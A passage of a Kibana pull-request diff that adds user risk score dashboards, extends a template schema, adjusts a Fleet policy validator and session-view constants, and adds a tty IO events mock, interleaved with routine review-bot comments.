'2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: + 'This dashboard allows users to drill down further into the details of the risk components associated with a particular user.', + hits: 0, + kibanaSavedObjectMeta: { + searchSourceJSON: '{"query":{"query":"","language":"kuery"},"filter":[]}', + }, + optionsJSON: '{"hidePanelTitles":false,"useMargins":true}', + panelsJSON: + '[{"version":"8.3.0","type":"visualization","gridData":{"x":0,"y":0,"w":48,"h":3,"i":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195"},"panelIndex":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195","embeddableConfig":{"savedVis":{"title":"","description":"","type":"markdown","params":{"fontSize":12,"openLinksInNewTab":false,"markdown":"The User Risk Score capability is an experimental feature. You can read further about it [here]"},"uiState":{},"data":{"aggs":[],"searchSource":{"query":{"query":"","language":"kuery"},"filter":[]}}},"hidePanelTitles":true,"enhancements":{},"type":"visualization"}},{"version":"8.0.0","type":"lens","gridData":{"x":0,"y":3,"w":48,"h":15,"i":"b3fdccab-59c1-47c8-9393-fa043e0dff83"},"panelIndex":"b3fdccab-59c1-47c8-9393-fa043e0dff83","embeddableConfig":{"enhancements":{}},"panelRefName":"panel_b3fdccab-59c1-47c8-9393-fa043e0dff83"},{"version":"8.0.0","type":"visualization","gridData":{"x":0,"y":18,"w":26,"h":65,"i":"8d09b97c-a023-4b7e-9e9d-1c46e726a487"},"panelIndex":"8d09b97c-a023-4b7e-9e9d-1c46e726a487","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"593ff0e6-25da-47ad-b81d-9a0106c0e9aa","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to User View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false,"vis":{"params":{"colWidth":[{"colIndex":0,"width":410.5}]}}},"title":"Alert Counts by 
User","panelRefName":"panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487"},{"version":"8.0.0","type":"visualization","gridData":{"x":26,"y":18,"w":22,"h":65,"i":"cae82aa1-20c8-4354-94ab-3934ac53b8fe"},"panelIndex":"cae82aa1-20c8-4354-94ab-3934ac53b8fe","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"0fd43778-bd5d-4b2b-85c3-47ac3b756434","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to User View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false,"vis":{"params":{"colWidth":[{"colIndex":0,"width":304}]}}},"title":"Alert Counts by Host","panelRefName":"panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe"},{"version":"8.0.0","type":"visualization","gridData":{"x":0,"y":83,"w":48,"h":15,"i":"ca3c8903-be5d-4265-820c-cc3d67443af2"},"panelIndex":"ca3c8903-be5d-4265-820c-cc3d67443af2","embeddableConfig":{"enhancements":{}},"panelRefName":"panel_ca3c8903-be5d-4265-820c-cc3d67443af2"}]', + timeRestore: false, + title: 'Drilldown of User Risk Score', + version: 1, + }, + coreMigrationVersion: '8.3.0', + id: '1355b030-ca2b-11ec-962f-a3a018b7d10f', + migrationVersion: { dashboard: '8.3.0' }, + references: [ + { + id: '60454070-9a5d-11ec-9633-5f782d122340', + name: 'b3fdccab-59c1-47c8-9393-fa043e0dff83:panel_b3fdccab-59c1-47c8-9393-fa043e0dff83', + type: 'lens', + }, + { + id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', + name: '8d09b97c-a023-4b7e-9e9d-1c46e726a487:panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487', + type: 'visualization', + }, + { + id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', + name: 'cae82aa1-20c8-4354-94ab-3934ac53b8fe:panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe', + type: 'visualization', + }, + { + id: '183d32f0-9a5e-11ec-90d3-1109ed409ab5', + name: 'ca3c8903-be5d-4265-820c-cc3d67443af2:panel_ca3c8903-be5d-4265-820c-cc3d67443af2', + type: 'visualization', + }, + { + id: 
'1d00ebe0-f3b2-11eb-beb2-b91666445a94', + name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', + type: 'tag', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 'tag-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + { + id: '2d22b2c0-feb0-11eb-bac9-4d64e825480b', + name: 'tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b', + type: 'tag', + }, + ], + type: 'dashboard', + updated_at: '2022-06-22T21:55:26.622Z', + }, + { + attributes: { + fieldAttrs: '{}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: '.siem-signals-', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: '6a98e860-f264-11ec-b875-8dd104de3c0f', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T19:49:24.075Z', + }, + { + attributes: { + fieldAttrs: '{"user.name":{"count":1}}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: 'ml_user_risk_score_latest_default', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: '0edd6710-cfd4-11ec-962f-a3a018b7d10f', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + state: { + datasourceStates: { + indexpattern: { + layers: { + '4fd27c60-031c-4cd6-9cc3-42eba11e4dc5': { + columnOrder: [ + 'a56deeb6-7001-42a3-80bf-d0d4cd389864', + 'f78c300e-883b-469b-bc12-c1bd1a3567c9', + 'd54be677-903e-45f4-8218-8e21fbcc692e', + ], + columns: { + 'a56deeb6-7001-42a3-80bf-d0d4cd389864': { + dataType: 'string', + isBucketed: true, + label: 'Top values of user.name', + operationType: 'terms', + params: { + missingBucket: false, + orderBy: { columnId: 'd54be677-903e-45f4-8218-8e21fbcc692e', type: 'column' }, + orderDirection: 'desc', + otherBucket: true, + parentFormat: { id: 'terms' }, + size: 100, + }, + scale: 'ordinal', + sourceField: 'user.name', + }, + 'd54be677-903e-45f4-8218-8e21fbcc692e': { 
+ dataType: 'number', + isBucketed: false, + label: 'Sum of risk_stats.risk_score', + operationType: 'sum', + scale: 'ratio', + sourceField: 'risk_stats.risk_score', + }, + 'f78c300e-883b-469b-bc12-c1bd1a3567c9': { + dataType: 'string', + isBucketed: true, + label: 'Top values of risk.keyword', + operationType: 'terms', + params: { + missingBucket: false, + orderBy: { columnId: 'd54be677-903e-45f4-8218-8e21fbcc692e', type: 'column' }, + orderDirection: 'desc', + otherBucket: true, + parentFormat: { id: 'terms' }, + size: 3, + }, + scale: 'ordinal', + sourceField: 'risk.keyword', + }, + }, + incompleteColumns: {}, + }, + }, + }, + }, + filters: [ + { + $state: { store: 'appState' }, + meta: { + alias: null, + disabled: false, + index: '915f434c-c7d6-4813-be8a-620ce7b2bfab', + key: 'risk.keyword', + negate: true, + params: { query: 'Unknown' }, + type: 'phrase', + }, + query: { match_phrase: { 'risk.keyword': 'Unknown' } }, + }, + ], + query: { language: 'kuery', query: '' }, + visualization: { + columns: [ + { columnId: 'a56deeb6-7001-42a3-80bf-d0d4cd389864', isTransposed: false }, + { columnId: 'f78c300e-883b-469b-bc12-c1bd1a3567c9', isTransposed: false }, + { columnId: 'd54be677-903e-45f4-8218-8e21fbcc692e', hidden: true, isTransposed: false }, + ], + layerId: '4fd27c60-031c-4cd6-9cc3-42eba11e4dc5', + layerType: 'data', + rowHeight: 'single', + rowHeightLines: 1, + }, + }, + title: 'Current Risk Score For Users', + visualizationType: 'lnsDatatable', + }, + coreMigrationVersion: '8.3.0', + id: '3b1fd7f0-d52d-11ec-b370-e3adc339bc8c', + migrationVersion: { lens: '8.3.0' }, + references: [ + { + id: '0edd6710-cfd4-11ec-962f-a3a018b7d10f', + name: 'indexpattern-datasource-layer-4fd27c60-031c-4cd6-9cc3-42eba11e4dc5', + type: 'index-pattern', + }, + { + id: '0edd6710-cfd4-11ec-962f-a3a018b7d10f', + name: '915f434c-c7d6-4813-be8a-620ce7b2bfab', + type: 'index-pattern', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 
'tag-ref-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + ], + type: 'lens', + updated_at: '2022-06-22T22:07:54.553Z', + }, + { + attributes: { + description: '', + hits: 0, + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"","language":"kuery"},"filter":[{"meta":{"negate":true,"type":"phrase","key":"risk.keyword","params":{"query":"Unknown"},"disabled":true,"alias":null,"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index"},"query":{"match_phrase":{"risk.keyword":"Unknown"}},"$state":{"store":"appState"}}]}', + }, + optionsJSON: '{"useMargins":true,"syncColors":false,"hidePanelTitles":false}', + panelsJSON: + '[{"version":"8.0.0","type":"lens","gridData":{"x":11,"y":0,"w":25,"h":32,"i":"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6"},"panelIndex":"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"299d13ec-93f5-48ce-a98d-cf7aeeca37d6","triggers":["FILTER_TRIGGER"],"action":{"factoryId":"DASHBOARD_TO_DASHBOARD_DRILLDOWN","name":"Go to Dashboard","config":{"useCurrentFilters":true,"useCurrentDateRange":true}}}]}}},"panelRefName":"panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6"}]', + timeRestore: false, + title: 'Current Risk Score For Users', + version: 1, + }, + coreMigrationVersion: '8.3.0', + id: '065c6df0-d530-11ec-b370-e3adc339bc8c', + migrationVersion: { dashboard: '8.3.0' }, + references: [ + { + id: '6a98e860-f264-11ec-b875-8dd104de3c0f', + name: 'kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index', + type: 'index-pattern', + }, + { + id: '3b1fd7f0-d52d-11ec-b370-e3adc339bc8c', + name: '359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6', + type: 'lens', + }, + { + id: '1355b030-ca2b-11ec-962f-a3a018b7d10f', + name: '359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:drilldown:DASHBOARD_TO_DASHBOARD_DRILLDOWN:299d13ec-93f5-48ce-a98d-cf7aeeca37d6:dashboardId', + type: 'dashboard', + }, + { + id: 
'1d00ebe0-f3b2-11eb-beb2-b91666445a94', + name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', + type: 'tag', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 'tag-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + { + id: '2d22b2c0-feb0-11eb-bac9-4d64e825480b', + name: 'tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b', + type: 'tag', + }, + ], + type: 'dashboard', + updated_at: '2022-06-22T21:55:26.622Z', + }, +]; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts index 4cbbf6a63ed90..2a7d221bf610a 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.test.ts @@ -14,9 +14,14 @@ describe('createPrebuiltSavedObjectsSchema', () => { ).toThrow(); }); - it.each([['hostRiskScoreDashboards']])('should allow template %p', async (template) => { - expect(createPrebuiltSavedObjectsSchema.params.validate({ template_name: template })).toEqual({ - template_name: template, - }); - }); + it.each([['hostRiskScoreDashboards', 'userRiskScoreDashboards']])( + 'should allow template %p', + async (template) => { + expect(createPrebuiltSavedObjectsSchema.params.validate({ template_name: template })).toEqual( + { + template_name: template, + } + ); + } + ); }); diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts index e5c5d0fc298e9..9a2ea0964ea57 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/schema.ts 
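Review bot: In the `panelsJSON` of the 'Drilldown of User Risk Score' dashboard (`1355b030-ca2b-11ec-962f-a3a018b7d10f`), the "Go to User View" drilldown on the "Alert Counts by User" panel — a table split by `user.name` — uses the template `{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}`, so a clicked user name is sent to the hosts page; this looks copied from the host dashboard and presumably should target the users route — confirm against the Security app's routes. The sibling "Alert Counts by Host" panel carries the same drilldown name "Go to User View" while pointing at hosts, and visualization `42371d00-cf7a-11eb-9a96-05d89f94ad96` has `title: 'Alerts by Hostname'` but a `visState` title of `Host Risk Score (Rule Breakdown)`; the markdown panel text `You can read further about it [here]` is a link label with no target. Because these objects are installed under fixed ids with `overwrite: true` (per the route test above), a later correction means re-running the template on existing installs, so the URLs are worth settling before this ships. The dump has no comments; a short header above `userRiskScoreDashboards` stating how the export was produced and which index patterns (`.siem-signals-`, `ml_user_risk_score_latest_default`) it expects to exist would help whoever regenerates it.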
@@ -9,6 +9,9 @@ import { schema } from '@kbn/config-schema';
 export const createPrebuiltSavedObjectsSchema = {
 params: schema.object({
- template_name: schema.oneOf([schema.literal('hostRiskScoreDashboards')]),
+ template_name: schema.oneOf([
+ schema.literal('hostRiskScoreDashboards'),
+ schema.literal('userRiskScoreDashboards'),
+ ]),
 }),
 };
diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts
index c3c65a6318dbf..172634e1a7652 100644
--- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts
+++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/types.ts
@@ -5,4 +5,4 @@
 * 2.0.
 */
-export type SavedObjectTemplate = 'hostRiskScoreDashboards';
+export type SavedObjectTemplate = 'hostRiskScoreDashboards' | 'userRiskScoreDashboards';
diff --git a/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts b/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts
index 0d5cf7684f02b..97b6ec743d109 100644
--- a/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts
+++ b/x-pack/plugins/security_solution/server/lib/timeline/utils/common.ts
@@ -5,7 +5,7 @@
 * 2.0.
 */
 import type * as rt from 'io-ts';
-import { set } from '@elastic/safer-lodash-set/fp';
+import { set } from '@kbn/safer-lodash-set/fp';
 import readline from 'readline';
 import fs from 'fs';
 import type { Readable } from 'stream';
diff --git a/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts b/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts
index c97f7053a5098..fa9c9250e2190 100644
--- a/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts
+++ b/x-pack/plugins/security_solution/server/lib/timeline/utils/migrator.ts
@@ -5,7 +5,7 @@
 * 2.0.
 */
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import _ from 'lodash';
 import type {
 SavedObject,
diff --git a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts
index d149b8c0fd7ba..a1918b628c1d4 100644
--- a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts
+++ b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.test.ts
@@ -144,12 +144,7 @@ describe('When using Artifacts Exceptions BaseValidator', () => {
 });
 it('should throw if policy ids for by policy artifacts are not valid', async () => {
- packagePolicyService.getByIDs.mockResolvedValue([
- {
- id: '123',
- version: undefined,
- } as PackagePolicy,
- ]);
+ packagePolicyService.getByIDs.mockResolvedValue([]);
 await expect(initValidator()._validateByPolicyItem(exceptionLikeItem)).rejects.toBeInstanceOf(
 EndpointArtifactExceptionValidationError
diff --git a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts
index 04a7d5a09875b..872d8da7cdb3d 100644
--- a/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts
+++ b/x-pack/plugins/security_solution/server/lists_integration/endpoint/validators/base_validator.ts
@@ -131,7 +131,9 @@ export class BaseValidator {
 return;
 }
- const policiesFromFleet = await packagePolicy.getByIDs(internalReadonlySoClient, policyIds);
+ const policiesFromFleet = await packagePolicy.getByIDs(internalReadonlySoClient, policyIds, {
+ ignoreMissing: true,
+ });
 if (!policiesFromFleet) {
 throw new EndpointArtifactExceptionValidationError(
@@ -139,9 +141,9 @@ export class BaseValidator {
 );
 }
- const invalidPolicyIds = policiesFromFleet
- .filter((policy) => policy.version === undefined)
- .map((policy) => policy.id);
+ const invalidPolicyIds = policyIds.filter(
+ (policyId) => !policiesFromFleet.some((policy) => policyId === policy.id)
+ );
 if (invalidPolicyIds.length) {
 throw new EndpointArtifactExceptionValidationError(
diff --git a/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts b/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts
index a20e5aba9fda1..f44ad77e67929 100644
--- a/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts
+++ b/x-pack/plugins/security_solution/server/search_strategy/helpers/format_response_object_values.ts
@@ -6,7 +6,7 @@
 */
 import { mapValues, isObject, isArray } from 'lodash/fp';
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { toArray } from '../../../common/utils/to_array';
 import { isGeoField } from '../../../common/utils/field_formatters';
diff --git a/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts b/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts
index d0a9991f866db..f40edfc5914df 100644
--- a/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts
+++ b/x-pack/plugins/security_solution/server/search_strategy/helpers/get_flattened_fields.ts
@@ -4,7 +4,7 @@
 * 2.0; you may not use this file except in compliance with the Elastic License
 * 2.0.
 */
-import { set } from '@elastic/safer-lodash-set';
+import { set } from '@kbn/safer-lodash-set';
 import { get, isEmpty } from 'lodash/fp';
 import { toObjectArrayOfStrings } from '../../../common/utils/to_array';
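Review bot: The membership test in this hunk, `policiesFromFleet.some(...)` inside `policyIds.filter(...)`, is quadratic in the number of policies; a set keeps it linear and states the intent (every requested id must resolve in Fleet) more directly: `const fleetPolicyIds = new Set(policiesFromFleet.map((policy) => policy.id));` followed by `const invalidPolicyIds = policyIds.filter((policyId) => !fleetPolicyIds.has(policyId));`. This is the check that stops an artifact from being scoped to a policy id Fleet does not know, so the rejection of unknown ids is the right outcome; the test change in base_validator.test.ts (previous hunk) only covers the case where Fleet returns nothing, and it no longer asserts that `getByIDs` is called with `{ ignoreMissing: true }`, so a regression that drops that option would not be caught by it — a case with one known and one unknown id would pin the new filter as well. The enclosing method starts and ends outside the hunk.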
diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts
index 3e92a733d12bd..93ce3a15009b7 100644
--- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts
+++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/all/helpers.ts
@@ -5,7 +5,7 @@
 * 2.0.
 */
-import { set } from '@elastic/safer-lodash-set/fp';
+import { set } from '@kbn/safer-lodash-set/fp';
 import { get, has } from 'lodash/fp';
 import { hostFieldsMap } from '../../../../../../common/ecs/ecs_fields';
 import type {
diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts
index 3f2a052ffc1b1..0c1ef643e663f 100644
--- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts
+++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/details/helpers.ts
@@ -5,7 +5,7 @@
 * 2.0.
 */
-import { set } from '@elastic/safer-lodash-set/fp';
+import { set } from '@kbn/safer-lodash-set/fp';
 import { get, has, head } from 'lodash/fp';
 import type {
 IScopedClusterClient,
diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts
index 15d1b3029a96d..3cae17446439f 100644
--- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts
+++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/hosts/uncommon_processes/helpers.ts
@@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import type { ProcessHits, diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts index 60cd570478488..53623d44205b3 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/authentications/helpers.ts @@ -6,7 +6,7 @@ */ import { get, getOr, isEmpty } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { toObjectArrayOfStrings } from '../../../../../../common/utils/to_array'; import { sourceFieldsMap, hostFieldsMap } from '../../../../../../common/ecs/ecs_fields'; import type { diff --git a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts index cf18f08476fcd..f6c9f1d194215 100644 --- a/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts +++ b/x-pack/plugins/security_solution/server/search_strategy/security_solution/factory/users/details/helpers.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { get, has } from 'lodash/fp'; import type { UserAggEsItem, diff --git a/x-pack/plugins/session_view/common/constants.ts b/x-pack/plugins/session_view/common/constants.ts index 371a54418c9b7..5bf0dc53701fc 100644 --- a/x-pack/plugins/session_view/common/constants.ts 
+++ b/x-pack/plugins/session_view/common/constants.ts 
@@ -5,35 +5,46 @@
 * 2.0.
 */
-export const PROCESS_EVENTS_ROUTE = '/internal/session_view/process_events_route';
-export const ALERTS_ROUTE = '/internal/session_view/alerts_route';
-export const ALERT_STATUS_ROUTE = '/internal/session_view/alert_status_route';
-export const SESSION_ENTRY_LEADERS_ROUTE = '/internal/session_view/session_entry_leaders_route';
+// routes
+export const PROCESS_EVENTS_ROUTE = '/internal/session_view/process_events';
+export const ALERTS_ROUTE = '/internal/session_view/alerts';
+export const ALERT_STATUS_ROUTE = '/internal/session_view/alert_status';
+export const IO_EVENTS_ROUTE = '/internal/session_view/io_events';
+export const GET_TOTAL_IO_BYTES_ROUTE = '/internal/session_view/get_total_io_bytes';
+
+// index patterns
 export const PROCESS_EVENTS_INDEX = '*:logs-endpoint.events.process*,logs-endpoint.events.process*'; // match on both cross cluster and local indices
 export const PREVIEW_ALERTS_INDEX = '.preview.alerts-security.alerts-default';
+
+// field properties
 export const ENTRY_SESSION_ENTITY_ID_PROPERTY = 'process.entry_leader.entity_id';
 export const ALERT_UUID_PROPERTY = 'kibana.alert.uuid';
 export const ALERT_ORIGINAL_TIME_PROPERTY = 'kibana.alert.original_time';
-export const ALERT_STATUS = {
- OPEN: 'open',
- ACKNOWLEDGED: 'acknowledged',
- CLOSED: 'closed',
-};
+export const TOTAL_BYTES_CAPTURED_PROPERTY = 'process.io.total_bytes_captured';
+// page sizes
 export const PROCESS_EVENTS_PER_PAGE = 500;
 export const ALERTS_PER_PROCESS_EVENTS_PAGE = 1500;
 export const ALERTS_PER_PAGE = 100;
-export const ALERTS_IN_FIRST_PAGE = 8;
-
-// when showing the count of alerts in details panel tab, if the number
-// exceeds ALERT_COUNT_THRESHOLD we put a + next to it, e.g 500+
-export const ALERT_COUNT_THRESHOLD = 500;
+export const IO_EVENTS_PER_PAGE = 2;
 // react-query caching keys
 export const QUERY_KEY_PROCESS_EVENTS = 'sessionViewProcessEvents';
 export const QUERY_KEY_ALERTS = 'sessionViewAlerts';
-export const LOCAL_STORAGE_DISPLAY_OPTIONS_KEY = 'sessionView:displayOptions';
+export const QUERY_KEY_IO_EVENTS = 'sessionViewIOEvents';
+export const QUERY_KEY_GET_TOTAL_IO_BYTES = 'sessionViewGetTotalIOBytes';
+// other
+export const ALERT_STATUS = {
+ OPEN: 'open',
+ ACKNOWLEDGED: 'acknowledged',
+ CLOSED: 'closed',
+};
+export const LOCAL_STORAGE_DISPLAY_OPTIONS_KEY = 'sessionView:displayOptions';
 export const MOUSE_EVENT_PLACEHOLDER = { stopPropagation: () => undefined } as React.MouseEvent;
-
 export const DEBOUNCE_TIMEOUT = 500;
+export const DEFAULT_TTY_PLAYSPEED_MS = 40; // milli seconds per line of tty output.
+
+// when showing the count of alerts in details panel tab, if the number
+// exceeds ALERT_COUNT_THRESHOLD we put a + next to it, e.g 999+
+export const ALERT_COUNT_THRESHOLD = 999;
diff --git a/x-pack/plugins/session_view/common/mocks/responses/session_view_io_events.mock.ts b/x-pack/plugins/session_view/common/mocks/responses/session_view_io_events.mock.ts
new file mode 100644
index 0000000000000..33b9ac56b035d
--- /dev/null
+++ b/x-pack/plugins/session_view/common/mocks/responses/session_view_io_events.mock.ts
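Review bot: `IO_EVENTS_PER_PAGE = 2` sits beside page sizes of 500, 1500 and 100 and looks like a value left over from development; with two events per page every scroll step becomes another request to IO_EVENTS_ROUTE, so either raise it or record why it is small, e.g. `export const IO_EVENTS_PER_PAGE = 2; // intentionally small: <reason>`. The re-added `ALERT_STATUS` object would also benefit from closing with `} as const;` so its members type as the literals `'open' | 'acknowledged' | 'closed'` instead of `string`, which is what code comparing against an alert's status wants. `DEFAULT_TTY_PLAYSPEED_MS` carries its unit in the comment, which is good; naming the consumer too (`// tty player: ms per line of output`) would give the next reader the only other context they need.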
@@ -0,0 +1,228 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { ProcessEventResults } from '../../types/process_tree'; + +export const sessionViewIOEventsMock: ProcessEventResults = { + events: [ + { + _index: 'logs-endpoint.events.process', + _id: '1', + _source: { + '@timestamp': '2022-07-14T11:16:29.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '1', + name: 'bash', + executable: '/bin/bash', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: "256\n,\n Some Companies Puppet instance\n | | | CentOS Stream release 8 on x86_64\n .=/ = = =| =| = === = Load average: 1.23, 1.01, 0.63\n | || || || || || | | | | \n /= = = =' =' =' ' =' Hostname ********\n \\ Type xyz\n o Datacenter ********\n Cluster ********\n\n\n\n\n,0 loaded units listed. Pass --all to see loaded but inactive units, too.\nTo show all installed unit files use 'systemctl list-unit-files'.\n", + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '2', + _source: { + '@timestamp': '2022-07-14T11:16:30.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: ',\u001b[?2004h\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[?2004h\u001b[1;59r\u001b[?12h\u001b[?12l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[?25l\u001b[59;1H"/usr/local/bin/galera_traffic_start.sh" [readonly] 14L, 397C\u001b[1;1H#!/bin/env bash\n# Copyright (C) 2022, ********(R) Corporation. 
